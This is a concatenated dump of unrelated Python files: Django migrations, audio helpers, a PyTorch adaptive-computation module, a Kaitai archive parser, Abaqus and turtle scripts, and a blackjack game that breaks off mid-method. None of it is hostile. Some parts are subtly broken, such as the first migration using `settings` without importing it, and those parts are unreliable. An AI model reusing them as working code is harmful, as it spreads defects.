import django.contrib.auth.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import encrypted_fields.fields
class Migration(migrations.Migration):
    """Initial schema for the hospital 'system' app (generated by Django 3.1.7).

    Creates a custom User model plus Department, Nurse, Status, Doctor and
    Appointment tables. Personally identifiable columns (phone, address,
    appointment email, gender) use encrypted column types from
    ``encrypted_fields``. Generated code — regenerate rather than hand-edit.
    """
    # First migration of this app: depends only on django.contrib.auth.
    initial = True
    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
    ]
    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                ('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
                ('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
                ('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
                ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
                ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
                ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
                ('email', models.EmailField(max_length=254, unique=True)),
                ('phone', encrypted_fields.fields.EncryptedCharField(blank=True, max_length=20, null=True)),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
            ],
            options={
                'verbose_name': 'user',
                'verbose_name_plural': 'users',
                'abstract': False,
            },
            managers=[
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
        migrations.CreateModel(
            name='Department',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name='Nurse',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='Status',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30)),
            ],
            options={
                'verbose_name': 'status',
                'verbose_name_plural': 'statuses',
            },
        ),
        migrations.CreateModel(
            name='Doctor',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email', models.EmailField(max_length=254, unique=True)),
                ('phone', encrypted_fields.fields.EncryptedCharField(max_length=20)),
                ('photo', models.ImageField(blank=True, null=True, upload_to='photos/%Y/%m/%d/')),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('speciality', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='system.department')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Appointment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=50, null=True)),
                ('address', encrypted_fields.fields.EncryptedCharField(max_length=20)),
                ('email', encrypted_fields.fields.EncryptedEmailField(max_length=254)),
                ('age', models.IntegerField()),
                ('phone', encrypted_fields.fields.EncryptedCharField(max_length=20)),
                ('gender', encrypted_fields.fields.EncryptedCharField(choices=[('Male', 'Male'), ('Female', 'Female')], max_length=20)),
                ('date', models.DateTimeField()),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='system.department')),
                ('doctor', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='system.doctor')),
                ('nurse', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='system.nurse')),
                ('status', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='system.status')),
            ],
        ),
        # Added after CreateModel('User') because they reference other tables
        # ('system.department') and auth.Permission.
        migrations.AddField(
            model_name='user',
            name='speciality',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='system.department'),
        ),
        migrations.AddField(
            model_name='user',
            name='user_permissions',
            field=models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions'),
        ),
    ]
|
991,262 | 3098b1140e29f77e1308f97680f2eda709e67441 | #Python for Beginner 제4장_06
#연산자 우선순위
#연산자가 여러 개 동시에 나오면 어떤 것을 먼저 처리할지 고려
우선순위 연산자 의미
===================================================================
1 () [] {} 괄호, 리스트, 딕셔너리, 세트 등
2 ** 지수
3 + - ~ 단항 연산자 # 덧셈 뺄셈이 아닌 숫자나 변수앞에 붙는 플러스, 마이너스 부호를 의미
4 * / % // 산술 연산자
5 + - 산술 연산자
6 << >> 비트 시프트 연산자
7 & 비트 논리곱
8 ^ 비트 배타적 논리합
9 | 비트 논리합
10 < > >= <= 관계 연산자
11 == != 동등 연산자 (참고: 파이썬에서는 10번과 11번의 비교 연산자가 실제로 같은 우선순위를 가지며, 연쇄 비교(a < b == c)가 가능하다)
12 = %= /= //= -= += *= **= 대입 연산자
13 not 논리 연산자
14 and 논리 연산자
15 or 논리 연산자
16 if~else 비교식
|
991,263 | b9a8fc64090f7c2f4e553beea28a92a7e34ecd9c | n = int(input())
# Read space-separated integers and print their cumulative XOR.
# The accumulator is renamed: the original shadowed the builtin ``sum``.
arr = [int(x) for x in input().split()]
xor_total = 0
for value in arr:
    xor_total ^= value
print(xor_total)
|
991,264 | a12775024d8eb003e159c316fea70912e7fb5db5 | import itertools
import os
from pydub import AudioSegment
from utils import pairwise
def concat_audio_files(audio_files, out_file):
    """Concatenate several audio files into one.

    The output format is taken from *out_file*'s extension (leading dot
    stripped, as pydub's ``export(format=...)`` expects).

    NOTE(review): ``sum`` starts from the integer 0, so this relies on
    AudioSegment supporting ``0 + segment`` (``__radd__``) — confirm with
    the pydub version in use.
    """
    _, out_file_ext = os.path.splitext(out_file)
    audio_segments = (AudioSegment.from_file(file) for file in audio_files)
    sum(audio_segments).export(out_file, format=out_file_ext[1:])
def cut_audio_segment(audio_segment, intervals):
    """Yield one slice of *audio_segment* per (start, end) pair in *intervals*."""
    for span in intervals:
        yield audio_segment[span[0]:span[1]]
def cut_audio_file(audio_file, intervals):
    """Slice *audio_file* at the given (start, end) positions and export each piece.

    Each slice is written next to the source as ``<name>_<idx><ext>`` with a
    1-based index, keeping the original container format. Positions are
    presumably milliseconds (pydub slices segments by ms) — confirm with
    callers.
    """
    audio_file_name, audio_file_extension = os.path.splitext(audio_file)
    audio_segment = AudioSegment.from_file(audio_file)
    slices = cut_audio_segment(audio_segment, intervals)
    for idx, current in enumerate(slices, 1):
        current.export(f'{audio_file_name}_{idx}{audio_file_extension}', format=audio_file_extension[1:])
def break_up_audio_file_by_timestamps(audio_file, timestamps):
    """Split *audio_file* at each timestamp into consecutive pieces.

    Builds intervals (0, t1), (t1, t2), ..., (tn, end-of-file) with the
    project's ``pairwise`` helper, then exports each piece as
    ``<name>_<idx><ext>`` (1-based index) in the original format.
    """
    audio_file_name, audio_file_ext = os.path.splitext(audio_file)
    audio_segment = AudioSegment.from_file(audio_file)
    # chain() pads the timestamp list with the start (0) and the segment length
    # so pairwise() yields a complete cover of the file.
    intervals = pairwise(itertools.chain((0,), timestamps, (len(audio_segment),)))
    slices = cut_audio_segment(audio_segment, intervals)
    for idx, current in enumerate(slices, 1):
        current.export(f'{audio_file_name}_{idx}{audio_file_ext}', format=audio_file_ext[1:])
def reverse_audio_file(audio_file, out_file):
    """Write *audio_file* played backwards to *out_file* (format from its extension)."""
    out_ext = os.path.splitext(out_file)[1]
    segment = AudioSegment.from_file(audio_file)
    segment.reverse().export(out_file, format=out_ext[1:])
|
991,265 | 270ed5bc348c5d45ff82516423c468d974585558 | import torch
from torch import nn
### CONVERTED FROM https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/research/universal_transformer_util.py#L1062
class ACT_basic(nn.Module):
    """Adaptive Computation Time (ACT) halting unit.

    Converted from tensor2tensor's ``universal_transformer_util`` (link in
    the original source). ``forward`` repeatedly applies ``fn`` to ``state``
    while a per-position sigmoid "ponder" head decides when each position
    halts; the returned state is the halting-probability-weighted mixture of
    the intermediate states.

    Fixes vs. the original: bookkeeping tensors follow ``inputs.device``
    instead of hard-coded ``.cuda()`` (so CPU runs too), and the
    ``encoder_output`` check uses ``is not None`` — truth-testing a
    multi-element tensor, as the original did, raises a RuntimeError.
    """
    def __init__(self, hidden_size):
        super(ACT_basic, self).__init__()
        self.sigma = nn.Sigmoid()
        # Single-unit halting head; bias init of 1 biases early steps toward
        # halting, matching the reference implementation.
        self.p = nn.Linear(hidden_size, 1)
        self.p.bias.data.fill_(1)
        self.threshold = 1 - 0.1

    def forward(self, state, inputs, fn, time_enc, pos_enc, max_hop, encoder_output=None):
        """Run ACT and return ``(new_state, (remainders, n_updates))``.

        Args:
            state: [B, S, H] working state, transformed each step by ``fn``.
            inputs: [B, S, H] reference tensor (shapes/device of bookkeeping).
            fn: transition fn; called ``fn(state)`` or, with encoder memory,
                ``fn((state, encoder_output))`` returning ``(state, _)``.
            time_enc, pos_enc: timing / per-step position signals added to
                ``state`` before each ponder step.
            max_hop: hard cap on ponder steps per position.
            encoder_output: optional encoder memory for decoder-side ACT.
        """
        device = inputs.device
        seq_len = inputs.shape[1]
        # [B, S] accumulated halting probability per position.
        halting_probability = torch.zeros(inputs.shape[0], seq_len, device=device)
        # [B, S] probability mass added at each position's halting step.
        remainders = torch.zeros(inputs.shape[0], seq_len, device=device)
        # [B, S] number of updates applied per position.
        n_updates = torch.zeros(inputs.shape[0], seq_len, device=device)
        # [B, S, H] running weighted mixture of intermediate states.
        previous_state = torch.zeros_like(inputs)
        step = 0
        # Step while any position has neither halted nor hit max_hop.
        while ((halting_probability < self.threshold) & (n_updates < max_hop)).any():
            # Add timing signal and the per-step position signal.
            state = state + time_enc[:, :seq_len, :].type_as(inputs.data)
            state = state + pos_enc[:, step, :].unsqueeze(1).repeat(1, seq_len, 1).type_as(inputs.data)
            p = self.sigma(self.p(state)).squeeze(-1)
            # Mask of positions which have not halted yet.
            still_running = (halting_probability < 1.0).float()
            # Positions which halt at this step.
            new_halted = (halting_probability + p * still_running > self.threshold).float() * still_running
            # Positions which keep running after this step.
            still_running = (halting_probability + p * still_running <= self.threshold).float() * still_running
            # Accumulate halting probability for the still-running positions.
            halting_probability = halting_probability + p * still_running
            # Remainder tops a halting position's probability up to ~1.
            remainders = remainders + new_halted * (1 - halting_probability)
            halting_probability = halting_probability + new_halted * remainders
            # Count this update for every position touched this step.
            n_updates = n_updates + still_running + new_halted
            # Mixing weight: p while running, the remainder at the halting
            # step, 0 once a position has halted.
            update_weights = p * still_running + new_halted * remainders
            if encoder_output is not None:
                state, _ = fn((state, encoder_output))
            else:
                # Apply the transition function to the state.
                state = fn(state)
            # Blend the updated positions into the running mixture; already
            # halted positions keep their accumulated value. previous_state
            # is the *new* state at loop end (name kept from the original).
            previous_state = ((state * update_weights.unsqueeze(-1)) + (previous_state * (1 - update_weights.unsqueeze(-1))))
            step += 1
        return previous_state, (remainders, n_updates)
991,266 | c80983ea0b8c9cec10ad6f2b499ea3c36b8cb596 | # This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
import collections
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class Dune2Pak(KaitaiStruct):
    """Parser for Dune II .PAK archives (kaitai-struct generated, debug mode).

    The archive begins with a directory of (offset, name) records; each
    file's body is addressed by its offset and delimited by the next
    record's offset (or end-of-stream for the last one). Generated code —
    edit the .ksy source and recompile rather than editing this file.
    """
    SEQ_FIELDS = ["dir"]
    def __init__(self, _io, _parent=None, _root=None):
        self._io = _io
        self._parent = _parent
        self._root = _root if _root else self
        # Per-field start/end stream positions recorded for debugging.
        self._debug = collections.defaultdict(dict)

    def _read(self):
        self._debug['dir']['start'] = self._io.pos()
        # NOTE(review): reads ``self.dir_size`` on the top-level object, yet
        # in this file the ``dir_size`` property appears declared under
        # ``File`` — verify the property's placement against the .ksy source.
        self._raw_dir = self._io.read_bytes(self.dir_size)
        _io__raw_dir = KaitaiStream(BytesIO(self._raw_dir))
        self.dir = Dune2Pak.Files(_io__raw_dir, self, self._root)
        self.dir._read()
        self._debug['dir']['end'] = self._io.pos()

    class Files(KaitaiStruct):
        # Repeated File records until the directory sub-stream is exhausted.
        SEQ_FIELDS = ["files"]
        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._debug = collections.defaultdict(dict)

        def _read(self):
            self._debug['files']['start'] = self._io.pos()
            self.files = []
            i = 0
            while not self._io.is_eof():
                if not 'arr' in self._debug['files']:
                    self._debug['files']['arr'] = []
                self._debug['files']['arr'].append({'start': self._io.pos()})
                # Each File knows its index so it can look up the next
                # entry's offset to bound its body.
                _t_files = Dune2Pak.File(i, self._io, self, self._root)
                _t_files._read()
                self.files.append(_t_files)
                self._debug['files']['arr'][len(self.files) - 1]['end'] = self._io.pos()
                i += 1
            self._debug['files']['end'] = self._io.pos()

    class File(KaitaiStruct):
        # One directory record: u4le offset + NUL-terminated ASCII name.
        # An offset of 0 marks the terminating record (no name follows).
        SEQ_FIELDS = ["ofs", "file_name"]
        def __init__(self, idx, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self.idx = idx
            self._debug = collections.defaultdict(dict)

        def _read(self):
            self._debug['ofs']['start'] = self._io.pos()
            self.ofs = self._io.read_u4le()
            self._debug['ofs']['end'] = self._io.pos()
            if self.ofs != 0:
                self._debug['file_name']['start'] = self._io.pos()
                self.file_name = (self._io.read_bytes_term(0, False, True, True)).decode(u"ASCII")
                self._debug['file_name']['end'] = self._io.pos()

        @property
        def next_ofs0(self):
            # Raw offset of the following directory entry (lazy, cached).
            # NOTE(review): indexes files[idx + 1] without a bounds check;
            # presumably safe because the last real entry is followed by a
            # terminating ofs==0 record — confirm against sample archives.
            if hasattr(self, '_m_next_ofs0'):
                return self._m_next_ofs0 if hasattr(self, '_m_next_ofs0') else None

            if self.ofs != 0:
                self._m_next_ofs0 = self._root.dir.files[(self.idx + 1)].ofs

            return self._m_next_ofs0 if hasattr(self, '_m_next_ofs0') else None

        @property
        def next_ofs(self):
            # End offset of this file's body: the next entry's offset, or the
            # whole-stream size when the next entry is the 0 terminator.
            if hasattr(self, '_m_next_ofs'):
                return self._m_next_ofs if hasattr(self, '_m_next_ofs') else None

            if self.ofs != 0:
                self._m_next_ofs = (self._root._io.size() if self.next_ofs0 == 0 else self.next_ofs0)

            return self._m_next_ofs if hasattr(self, '_m_next_ofs') else None

        @property
        def body(self):
            # File contents: bytes [ofs, next_ofs) read from the root stream,
            # restoring the stream position afterwards.
            if hasattr(self, '_m_body'):
                return self._m_body if hasattr(self, '_m_body') else None

            if self.ofs != 0:
                io = self._root._io
                _pos = io.pos()
                io.seek(self.ofs)
                self._debug['_m_body']['start'] = io.pos()
                self._m_body = io.read_bytes((self.next_ofs - self.ofs))
                self._debug['_m_body']['end'] = io.pos()
                io.seek(_pos)

            return self._m_body if hasattr(self, '_m_body') else None

        @property
        def dir_size(self):
            # Directory size: the u4le at stream offset 0 (i.e. the first
            # entry's offset, where the data area begins).
            if hasattr(self, '_m_dir_size'):
                return self._m_dir_size if hasattr(self, '_m_dir_size') else None

            _pos = self._io.pos()
            self._io.seek(0)
            self._debug['_m_dir_size']['start'] = self._io.pos()
            self._m_dir_size = self._io.read_u4le()
            self._debug['_m_dir_size']['end'] = self._io.pos()
            self._io.seek(_pos)
            return self._m_dir_size if hasattr(self, '_m_dir_size') else None
|
991,267 | f1eacbe9ce5d936928bda97704e16584ef784392 | from Framework.Genetics.LocationBuildController import LocationBuildController
from Framework.RunController import RunController
from NQueens.LocationCreators.NQueensLocationBuilderParameters import NQueensLocationBuilderParameters
from NQueens.NQueensDemeBuilder import NQueensDemeBuilder
from NQueens.NQueensHistoricalLocationBuilder import NQueensHistoricalLocationBuilder
from NQueens.NQueensLocationBuildController import NQueensLocationBuildController
from NQueens.NQueensLocationStore import NQueensLocationStore
class NQueensRunController(RunController):
    """Run controller for the N-Queens search.

    Owns a population of demes; each update pass evaluates every deme and
    replaces any deme whose membership has died out with a freshly built one.
    """

    def __init__(self, parameters):
        super(NQueensRunController, self).__init__(parameters, NQueensLocationStore(parameters))
        self.parameters = parameters
        self.foundResults = []
        self.demes = []
        self.locationBuildController = LocationBuildController(parameters, parameters.location_builders)
        self.demeBuilder = NQueensDemeBuilder(parameters, self.locationBuildController, self)
        self.demes = self.initialiseDemes(parameters)
        self.deme_locations = {}

    def update(self, problem):
        """Evaluate and update every deme; swap empty demes for fresh ones."""
        super(NQueensRunController, self).update(problem)
        # Iterate a snapshot: the original removed items from self.demes
        # while iterating it directly, which silently skips the element
        # following each removal (mutate-while-iterating bug).
        for deme in list(self.demes):
            deme.evaluate(problem)
            deme.update()
            if len(deme.members) == 0:
                self.demes.remove(deme)
                self.insertNewDeme()

    def insertNewDeme(self):
        """Build one new deme at a fresh location and add it to the pool."""
        build_params = NQueensLocationBuilderParameters(self.location_store)
        newDeme = self.demeBuilder.build_with_location(build_params)
        self.demes.append(newDeme)

    def initialiseDemes(self, parameters):
        """Create the initial population of ``total_demes`` demes."""
        return [self.demeBuilder.build() for x in range(0, parameters.total_demes)]
991,268 | 7668898a1e0536a9f13d25acfa8cf9278ff55cf1 | # Question 15:write a program that ask the user to enter two numbers ,x and y,and computes |x-y|/x+y.
x = float(input('Enter x: '))
y = float(input('Enter y: '))
# NOTE(review): as written this evaluates (|x-y| / x) + y because division
# binds tighter than addition; if the exercise means |x-y| / (x+y), the
# denominator needs parentheses — confirm the intended formula.
print(abs(x-y)/x+y)
991,269 | fd2345dfb339589f2cc3022acd167c47e789dd1f | from abaqusGui import *
from abaqusConstants import ALL
import osutils, os
###########################################################################
# Class definition
###########################################################################
class _rsgTmp322_Form(AFXForm):
    """Abaqus/CAE GUI form for the 'Fibre_insert' plug-in.

    Generated by the RSG dialog builder: registers the kernel command
    ``Fibre_insert.Fibre_insert`` and one AFX keyword per dialog widget.
    """

    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def __init__(self, owner):

        # Construct the base class.
        #
        AFXForm.__init__(self, owner)
        self.radioButtonGroups = {}

        # Kernel command issued when the dialog is committed; each keyword
        # below becomes one argument of that command.
        self.cmd = AFXGuiCommand(mode=self, method='Fibre_insert',
            objectName='Fibre_insert', registerQuery=False)
        pickedDefault = ''
        self.uel_modeKw = AFXBoolKeyword(self.cmd, 'uel_mode', AFXBoolKeyword.TRUE_FALSE, True, False)
        self.modelNameKw = AFXStringKeyword(self.cmd, 'modelName', True)
        self.partNameKw = AFXStringKeyword(self.cmd, 'partName', True)
        self.variableKw = AFXObjectKeyword(self.cmd, 'variable', TRUE, pickedDefault)
        self.concreteKw = AFXStringKeyword(self.cmd, 'concrete', True, 'C25')
        self.thicknessKw = AFXFloatKeyword(self.cmd, 'thickness', True, 50)
        self.diameterKw = AFXStringKeyword(self.cmd, 'diameter', True, '0.2')

    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def getFirstDialog(self):

        # Imported lazily: the dialog module is a generated temp file that
        # only exists while the plug-in is installed.
        import _rsgTmp322_DB
        return _rsgTmp322_DB._rsgTmp322_DB(self)

    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def doCustomChecks(self):

        # Try to set the appropriate radio button on. If the user did
        # not specify any buttons to be on, do nothing.
        #
        for kw1,kw2,d in self.radioButtonGroups.values():
            try:
                value = d[ kw1.getValue() ]
                kw2.setValue(value)
            except:
                pass
        return True

    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def deactivate(self):

        # Best-effort cleanup of the generated temp dialog/form modules;
        # failures (e.g. files already gone) are deliberately ignored.
        try:
            osutils.remove(os.path.join('c:\\Users\\Hasee\\abaqus_plugins\\Fibre_insert', '_rsgTmp322_DB.py'), force=True )
            osutils.remove(os.path.join('c:\\Users\\Hasee\\abaqus_plugins\\Fibre_insert', '_rsgTmp322_DB.pyc'), force=True )
        except:
            pass
        try:
            osutils.remove(os.path.join('c:\\Users\\Hasee\\abaqus_plugins\\Fibre_insert', '_rsgTmp322_Form.py'), force=True )
            osutils.remove(os.path.join('c:\\Users\\Hasee\\abaqus_plugins\\Fibre_insert', '_rsgTmp322_Form.pyc'), force=True )
        except:
            pass
        AFXForm.deactivate(self)

    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def getCommandString(self):

        # Prepend the module import so the kernel can resolve the command.
        cmds = 'import Fibre_insert\n'
        cmds += AFXForm.getCommandString(self)
        return cmds

    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def okToCancel(self):

        # No need to close the dialog when a file operation (such
        # as New or Open) or model change is executed.
        #
        return False
|
991,270 | c49248531904d59e685fe5d1242556b4e18d06c1 | from turtle import *
# Configure an orange, turtle-shaped pen at 5x size, medium speed.
pidge = Turtle()
pidge.color('orange')
pidge.pensize(5)
pidge.speed(5)
pidge.shape('turtle')
pidge.turtlesize(5, 5, 5)

# Trace a square: four 100-unit sides with a 90-degree left turn after each.
for _ in range(4):
    pidge.forward(100)
    pidge.left(90)

mainloop()
|
991,271 | 2bd64565505c7e80a00259e87085949275143037 | # Generated by Django 3.1.6 on 2021-02-19 04:54
from django.db import migrations, models
import djmoney.models.fields
class Migration(migrations.Migration):
    """Add ``order_id`` to Order and pin its ``amount`` default currency to TMT.

    Generated by Django 3.1.6 — regenerate rather than hand-edit.
    """

    dependencies = [
        ('order', '0004_auto_20210218_2132'),
    ]

    operations = [
        # Nullable so existing rows need no backfill at migration time.
        migrations.AddField(
            model_name='order',
            name='order_id',
            field=models.UUIDField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='order',
            name='amount',
            field=djmoney.models.fields.MoneyField(decimal_places=2, default_currency='TMT', max_digits=14, verbose_name='Amount'),
        ),
    ]
|
991,272 | bac2e4af3aafe7f2bc6488dbe4a0b09cf18cb310 | # A full-feature game of Blackjack
from random import shuffle
from time import sleep
from os import system
class Card():
    """A single playing card identified by numeric value (2-14) and suit index.

    ``values`` is padded with two ``None`` entries so a card's numeric value
    doubles as its index (2 -> "2", ..., 14 -> "Ace").
    """
    suits = ["spades", "diamonds", "hearts", "clubs"]
    values = [None, None, "2", "3", "4", "5", "6", "7", "8", "9", "10", "Jack", "Queen", "King", "Ace"]

    def __init__(self, value, suit):
        self.value = value
        self.suit = suit

    def __repr__(self):
        # e.g. "Ace of spades"
        return f"{self.values[self.value]} of {self.suits[self.suit]}"

    def __add__(self, other):
        # Adding two cards yields a two-card hand (a plain list).
        return [self, other]
class Deck():
    """A shuffled 52-card deck; ``remove_card`` deals from the top."""

    def __init__(self):
        # One card per (suit, value) combination, shuffled in place.
        self.cards = [Card(value, suit) for suit in range(4) for value in range(2, 15)]
        shuffle(self.cards)

    def remove_card(self):
        """Deal one card, or return None once the deck is exhausted."""
        if not self.cards:
            return None
        return self.cards.pop()
class Player():
    """A blackjack player: name, bankroll, up to two hands, and round flags."""

    def __init__(self, name):
        self.name = name
        self.bankroll = 1000
        self.hand = []
        self.hand2 = []               # second hand, used only after a split
        self.final_hand_val = 0
        self.final_hand2_val = 0
        self.blackjack = False
        self.split = False            # split option available this round
        self.double_down = False      # double-down option available this round
        self.went_split = False       # player actually split
        self.went_double = False      # player actually doubled down
        self.display_hand_val = []    # values shown by the table renderer

    def hand_value_check(self, hand):
        """Return every possible total of *hand*, largest first.

        Court cards count 10; each ace may count as 11 or 1, so a hand with
        k aces yields k+1 candidate totals. The result is also cached in
        ``display_hand_val`` for the table display.
        """
        total = 0
        aces = 0
        for card in hand:
            if card.value < 10:
                total += card.value
            elif card.value == 14:    # ace: start at 11, remember it can be demoted
                total += 11
                aces += 1
            else:                     # 10 / Jack / Queen / King
                total += 10
        # One alternative total per ace demoted from 11 down to 1.
        result = [total - 10 * k for k in range(aces + 1)]
        self.display_hand_val = result
        return result
class Dealer():
    """The house: a large bankroll and one hand whose aces always count 11."""

    def __init__(self):
        # NOTE: mirrors the original — stores the class object, not a string.
        self.name = Dealer
        self.bankroll = 1000000
        self.hand = []
        self.blackjack = False
        self.final_hand_value = 0
        self.display_hand_val = []

    def hand_value_check(self, hand):
        """Return ``[total]`` for *hand*.

        Unlike Player.hand_value_check, every ace is fixed at 11, so the
        returned list always holds exactly one value. Also cached in
        ``display_hand_val`` for the table display.
        """
        total = 0
        for card in hand:
            if card.value < 10:
                total += card.value
            elif card.value == 14:    # ace, always 11 for the dealer
                total += 11
            else:                     # 10 / Jack / Queen / King
                total += 10
        result = [total]
        self.display_hand_val = result
        return result
class Bank():
    # Holds the player's stake for the current round; player1_bet2 is the
    # stake on the second hand after a split.
    def __init__(self):
        self.player1_bet = 0
        self.player1_bet2 = 0

    def make_bet(self):
        # Prompt until the user types something int()-parsable, then move
        # the stake from the player's bankroll (via the module-level game
        # object ``bj``) into this bank.
        # NOTE(review): the amount is not checked against the bankroll, so a
        # bet larger than the player's funds drives bankroll negative.
        while True:
            a = input("Enter the bet amount:\n")
            try:
                bet = int(a)
                break
            except:
                print("Invalid bet amount. Try again.")
        bj.player1.bankroll -= bet
        self.player1_bet = bet
class Table():
    # Console renderer for the current game state; reads everything from the
    # module-level game object ``bj``.
    def __init__(self):
        self.stage = "start" # draw different stages of the game
        self.dealer_phase = False
    def draw_table(self, time=0.75): # draw game state
        # Clears the console (Windows-only 'cls'), prints dealer area, bets,
        # player area, then pauses ``time`` seconds for pacing.
        system('cls')
        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
        print(f"Dealer: {bj.dealer.bankroll}$".center(60))
        # Dealer's hand: fully revealed during the dealer phase or on a
        # natural blackjack, otherwise only the first card ("XX" hides the
        # hole card).
        if self.dealer_phase is True:
            print(f"{', '.join(str(c) for c in bj.dealer.hand)}".center(60))
        elif self.stage == "natural BJ":
            print(f"{bj.dealer.hand[0]}, {bj.dealer.hand[1]}".center(60))
        elif self.stage == "start":
            print(f"{bj.dealer.hand[0]} XX".center(60))
        print("\n")
        # Dealer's hand value is only shown once the dealer plays.
        if len(bj.dealer.display_hand_val) > 0 and self.dealer_phase is True:
            print(f"{max(bj.dealer.display_hand_val)}\n".center(60))
        else:
            print("\n")
        # Bets: two columns after a split, one centered amount otherwise.
        if self.stage == "split":
            print(f"{bj.bank.player1_bet}".center(30), f"{bj.bank.player1_bet2}\n".center(30))
        else:
            print(f"{bj.bank.player1_bet}$\n".center(60))
        if self.stage == "BJ!":
            print("BLACK JACK!\n".center(60))
        elif len(bj.player1.display_hand_val) > 0:
            # NOTE(review): this branch mutates bj.player1.display_hand_val
            # (a rendering side effect on game state) to drop busted (>21)
            # alternatives before displaying the best value.
            if len(bj.player1.display_hand_val) > 1: # cut 22+ display values only if there are other values to display
                temp = [x for x in bj.player1.display_hand_val if x <= 21] # if both remaining values > 21, leave smaller one
                if len(temp) == 0:
                    bj.player1.display_hand_val = [min(bj.player1.display_hand_val)]
                else:
                    bj.player1.display_hand_val = [x for x in bj.player1.display_hand_val if x <= 21]
            print(f"{max(bj.player1.display_hand_val)}\n".center(60))
        else:
            print("\n")
        # Player's cards: side-by-side hands after a split.
        if self.stage == "split":
            print(f"{', '.join(str(c) for c in bj.player1.hand)}".center(30), "||", f"{', '.join(str(c) for c in bj.player1.hand2)}".center(30))
        else:
            print(f"{', '.join(str(c) for c in bj.player1.hand)}".center(60))
        print(f"{bj.player1.name}: {bj.player1.bankroll}$".center(60))
        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
        sleep(time)
class Game():
def __init__(self):
name1 = input("Player1 name is: ")
self.player1 = Player(name1)
self.dealer = Dealer()
self.deck = Deck()
self.bank = Bank()
self.table = Table()
print(f"{self.player1.name}, welcome to a game of BlackJack!")
def reset(self):
self.deck = Deck()
self.bank = Bank()
self.table = Table()
self.player1.hand = []
self.player1.hand2 = []
self.player1.final_hand_val = 0
self.player1.final_hand2_val = 0
